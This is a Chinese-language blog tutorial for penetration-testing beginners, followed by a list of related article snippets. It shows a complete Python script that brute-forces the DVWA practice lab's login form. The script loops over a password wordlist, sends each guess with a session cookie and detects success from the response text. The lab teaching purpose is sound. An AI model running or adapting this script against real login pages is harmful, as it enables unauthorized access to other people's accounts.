渗透测试入门学习——编写python脚本实现对网站登录页面的暴力破解

已于 2024-09-29 14:50:15 修改
阅读量208 收藏
点赞数 3
文章标签: web安全 python 安全 http https 网络安全
于 2024-09-29 14:46:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44611153/article/details/142634933
版权

进入靶场输入任意密码进行尝试

发现登陆失败的特征字:“Username and/or password incorrect”

推荐用谷歌浏览器,按F12继续查看请求地址、请求头参数等详细信息,着重关注是否需要Cookie

编写python脚本

import requests
# 填入请求地址
url = "http://192.168.160.131/DVWA/vulnerabilities/brute/"
# 填入请求头中的Cookie值
cookie = "security=low; PHPSESSID=gcgc5dhp7ikcedlhojofijia44"
username = "admin"
# success为未知,但可以尝试出登陆失败的信息
success = ""
failure = "Username and/or password incorrect"

count = 0

with open("./pswd.txt", 'r') as file:

    while True:
        # 按行读,避免用readlines()读取全部后导致占用太多内存
        line = file.readline()
        # 如果读到内容为空的行则结束
        if not line:
           break;
        # 每行结尾自带换行符需要去掉
        line = line.strip()
        # 发送请求
        count += 1
        response = requests.get(url = url,
                                params = {"username":username, "password":line, "Login":"Login"},
                                headers = {"Cookie":cookie})
        # 判断请求中有无特征字
        if failure in response.text:
            print("第"+ str(count) +"次尝试--失败:",line)
        else :
            print("第"+ str(count) +"次尝试--成功:",line)
            break;

准备字典

执行脚本

验证暴力破解的结果是否正确

Dovir多多
关注
渗透测试之攻破登录页面
瓦罗兰特顶级C位的博客
01-09 2046
登陆界面最直接的就是密码爆破,上面说的那些漏洞我也说了,很难遇到!而对于爆破最重要的不是用的哪个工具,而是字典好不好,这里用的bp!
渗透测试入门—— 常见术语概述
weixin_46694260的博客
12-26 9181
00x1 前言 刚入门小白,收集了一些渗透术语,废话不多说。 00x2 渗透术语 1.脚本 动态网站(如:asp,php,jsp), linux, python 2.网站 2.1静态网站:与后台交互比较少,如html) 2.2动态网站:使用动态脚本编写 如:asp,php,jsp,交互方便但是安全性不高,如果代码过滤不严格可能会导致漏洞最终导致后台linux被别人随意操作 3.http协议 http(HyperText Transfer Protocol),超文本传输协议。是因特网上应用最为广泛的一种网络传
黑客入门——最好用的渗透测试工具
韩束一叶子
07-29 793
nmap是用来探测计算机网络上的主机和服务的一种安全扫描器。为了绘制网络拓扑图,Nmap的发送特制的数据包到目标主机,然后对返回数据包进行分析。Nmap是一款枚举和测试网络的强大工具。
软件测试需要学习什么?好就业么
weixin_51689029的博客
03-02 1559
软件测试需要学习测试环境、网络环境、windows环境、数据库管理、编程技巧(java编程设计,脚本语言,设计工具,XML编程、软件测试技术,测试理论,方法,流程,文档作,测试工具,自动测试、测试技术实践等内容。测试基础是软件测试最最最重要的部分,只要你是做测试,不管是什么测试,测试的基础、理论知识都是必须学会的最好学到什么程度呢,最好是能够理解,并能够用自己的话给复述出来。毕竟面试初级测试的时候,问的问题都是从基础理论上进行考核的。
【11年资深渗透工程师整理】全网最全的网络安全学习路线!_安全渗透入门 学习顺序
2401_84300239的博客
05-02 1185
就足矣。下面的内容,一定要结合上面这张图看效果才最好,建议在浏览器中新建一个 tab 页面,打开那张图,结合着看。如果图片压缩不清晰,可以下载高清的思维脑图;①网安学习路线高清思维脑图②20 份渗透测试电子书③安全攻防 357 页笔记④50 份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100 个漏洞实战案例⑧安全大厂内部教程第一个阶段——石器时代,针对的是纯新手小白刚刚入场。
渗透入门——术语概述
菜鸟-传奇
10-23 3357
渗透入门——术语概述 常见术语 渗透流程 明确目标——信息收集——漏洞探测——漏洞验证——编写报告 ——信息整理——获取所需——信息分析 脚本:动态网站(asp,php,jsp), linux, python 网站:静态网站(与后台交互比较少,如html) 动态网站(使用动态脚本编写 如:asp,php,jsp,交互方便但是安全性不高,如果代码过滤不严格可能会导致漏洞最终导致后台li...
软件测试学习什么?好就业么
weixin_51689029的博客
02-21 529
软件测试需要学习测试环境、网络环境、windows环境、数据库管理、编程技巧(java编程设计,脚本语言,设计工具,XML编程、软件测试技术,测试理论,方法,流程,文档作,测试工具,自动测试、测试技术实践等内容。测试基础是软件测试最最最重要的部分,只要你是做测试,不管是什么测试,测试的基础、理论知识都是必须学会的最好学到什么程度呢,最好是能够理解,并能够用自己的话给复述出来。毕竟面试初级测试的时候,问的问题都是从基础理论上进行考核的。
【2024最】网络安全入门到精通(超详细)学习路线
weixin_57514792的博客
07-01 1211
【2024最】网络安全入门到精通(超详细)学习路线
Python 渗透测试学习指南(一)
龙哥盟
07-21 2056
欢迎阅读《用 Python 学习渗透测试》。本书采用了一种完全不同的方法来教授渗透测试Python 脚本编写,而不是强调如何创建与市场上当前工具相同的脚本,或者强调可以编写的特定类型的利用。我们将探讨如何进行参与,并了解脚本如何适用于评估以及当前工具满足需求的地方。这种方法将教会你不仅如何从编写入门脚本到多线程攻击工具,还将教会你如何像专业人士一样评估组织,而不管你的经验水平如何。对于渗透测试的概念存在着巨大的误解。即使是最近进入该领域的专业人士也普遍存在这种误解。
书籍推荐——Python绝技:运用Python成为顶级黑客
iMotherBoard的博客
06-15 2214
Python绝技:运用Python成为顶级黑客 本文推荐一本关于信息安全的图书:《Python绝技:运用Python成为顶级黑客》。 当您听到黑客这个词的时候是不是有点激动呢,尤其是顶级黑客是不是更让人觉得高深莫测。如果您对黑客技术感兴趣,希望您能阅读此书,虽然不能保证您看完此书就能成为顶级黑客,但是您可以了解相关内容,在信息世界中保护自己不受到伤害。 如果您是从事信息安全、计算机安全管理、计算机犯罪调查和电子取证、渗透测试等方向的从业人员,也推荐您看这本书,该书可以丰富您的知识储备,点亮更多技能树。 该
Python安全攻防-从入门到入狱
热门推荐
Yasso的博客
01-31 1万+
Python安全攻防-从入门到入狱
暴力Python:黑客与安全工程师的Python编程实战
4. **网络流量分析**:通过Python脚本解析网络流量,识别IP地址、检测DDoS攻击、发现隐藏扫描、分析僵尸网络活动以及规避入侵检测系统,提升网络监控和防御能力。 5. **无线攻击**:关注无线网络和蓝牙设备的攻击...
Web安全防攻(渗透测试
m0_62959521的博客
04-07 3271
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程序中会有5...
防火墙|WAF|漏洞|网络安全
最新发布
qq_43777616的博客
11-06 342
一种网络安全设备,监视网络流量,并且根据预定义的规则和策略检测阻止可能的网络攻击,可以部署在网络边界(不同安全级别的网络之间的连接形成了网络边界)、数据中心、云环境、边界防火墙等位置部署,以防止来自外部和内部网络的攻击。防火墙工作于OSI模型层次越高,检查数据包中的信息就越多,消耗的工作周期越长,提供的安全保护等级就越高。漏洞是指一个系统存在的弱点或缺陷,系统对特定威胁攻击或危险事件的敏感性,或进行攻击的威胁作用的可能性。单独的硬件,用于过滤进出网络的流量,适合大型企业。
网络安全入门到精通(特别篇IIl):应急响应之病毒蠕虫处置流程
HACKONE的博客
11-06 53
排查 init.d 目录下的脚本文件,如果某个脚本启动的服务进程与名称不符,或者脚本文件的内容被修改,加有别的什么东西启动了别的进程,必须仔细排查,极可能是被用来启动后门进程了。排查C: \、C: \winnt、C: \winnt\System 、C: \winnt\ System32、C: \winnt\System32\dllcache、C: \winnt\System32\ drivers、各个Program Files目录下的内容,排查他们目录及文件的属性,若无版本说明,多为可疑文件;
2024年网络安全进阶手册:黑客技术自学路线
2401_85026965的博客
10-29 1477
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
入门网络安全工程师要学习哪些内容(详细教程)
白帽子佳奇的博客
11-06 419
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
【知识科普】常见网络安全问题以及应对方式
wendao76的专栏
11-03 641
通过实现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值